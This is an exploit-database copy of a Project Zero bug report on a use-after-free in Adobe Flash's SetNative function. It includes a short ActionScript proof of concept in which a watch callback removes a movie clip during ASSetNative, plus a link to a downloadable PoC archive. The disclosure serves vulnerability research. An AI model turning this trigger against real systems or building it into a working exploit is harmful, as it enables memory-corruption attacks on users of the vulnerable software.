20 lines
No EOL
561 B
Text
20 lines
No EOL
561 B
Text
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=800
|
|
|
|
There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:
|
|
|
|
var t = this.createEmptyMovieClip("t", 1);
|
|
t.watch("a", func);
|
|
ASSetNative(t, 106, "a,b");
|
|
|
|
|
|
function func (){
|
|
|
|
t.removeMovieClip();
|
|
|
|
}
|
|
|
|
A swf and fla are attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39831.zip |